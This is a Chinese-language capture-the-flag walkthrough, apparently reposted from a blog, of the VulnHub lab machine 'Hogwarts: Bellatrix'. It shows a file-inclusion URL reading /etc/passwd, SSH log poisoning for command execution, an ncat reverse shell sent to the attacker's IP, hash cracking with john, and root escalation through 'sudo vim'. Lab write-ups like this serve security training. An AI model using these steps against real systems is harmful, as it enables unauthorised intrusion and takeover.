首页 > 其他 > 详细

HOGWARTS: BELLATRIX

时间:2021-07-02 01:10:54      阅读:12      评论:0      收藏:0      [点我收藏+]

靶机地址:https://www.vulnhub.com/entry/hogwarts-bellatrix,609/

 

攻击机ip:192.168.99.128
靶机地址ip:192.168.99.144

扫描靶机端口,开放了22、80

技术分享图片

访问80端口

技术分享图片

查看网页源代码,有个目录的.php文件存在文件包含

技术分享图片

网页源码有存在一个.php文件,参数是file

技术分享图片

存在文件包含

http://ip/ikilledsiriusblack.php?file=/etc/passwd

技术分享图片

尝试用包含SSH的日志信息

技术分享图片

现在稍微污染一下SSH日志信息

技术分享图片

http://ip/ikilledsiriusblack.php?file=/var/log/auth.log&cmd=id

命令执行

技术分享图片

用命令执行来反弹shell

http://192.168.99.144/ikilledsiriusblack.php?file=/var/log/auth.log&c=ncat -e /bin/bash 192.168.99.128 1234

技术分享图片

在一个隐藏目录下找到一个字典

技术分享图片

还有一个hash

技术分享图片

保存下来,用john进行爆破, 得到密码 ihateharrypotter

技术分享图片

切换用户

技术分享图片

vim可以提权

 技术分享图片

sudo vim
:!/bin/bash

技术分享图片

获取root权限

技术分享图片

 

参考地址:https://www.hackingarticles.in/hogwarts-bellatrix-vulnhub-walkthrough/

HOGWARTS: BELLATRIX

原文:https://www.cnblogs.com/gaonuoqi/p/14961377.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!